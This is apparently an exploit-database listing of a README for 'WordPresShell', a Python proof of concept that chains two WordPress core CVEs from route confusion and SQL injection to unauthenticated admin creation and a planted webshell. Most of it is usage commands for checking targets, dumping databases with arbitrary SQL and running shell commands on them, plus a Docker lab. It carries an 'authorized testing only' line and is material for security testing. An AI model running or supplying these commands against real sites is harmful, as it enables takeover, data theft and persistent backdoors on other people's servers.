Share
## https://sploitus.com/exploit?id=44801C66-CC47-586B-A3EB-E4112C53B6BE
# WordPresShell
Pre-auth RCE PoC for **CVE-2026-63030** + **CVE-2026-60137** (WordPress core).
REST `/batch/v1` route confusion โ `WP_Query author__not_in` SQLi โ unauthenticated
admin creation โ webshell. Single file, Python stdlib only.
Vulnerability: Adam Kues (Searchlight Cyber). Affected: 6.9.0โ6.9.4, 7.0.0โ7.0.1. Fixed: 6.9.5 / 7.0.2.
## Usage
```
python3 WordPresShell.py check http://target # confirm (non-destructive)
python3 WordPresShell.py dump http://target [--query "SELECT @@version"]
python3 WordPresShell.py shell http://target --cmd "id" # crack-free RCE
python3 WordPresShell.py shell http://target -i # interactive
python3 WordPresShell.py shell http://target --user U --password P --cmd id
```
## Lab
```
docker compose up -d # WordPress 7.0.1 on :8092
docker compose down -v # teardown
```
`shell` creates an admin and drops a webshell โ remove both after testing.
Authorized testing only.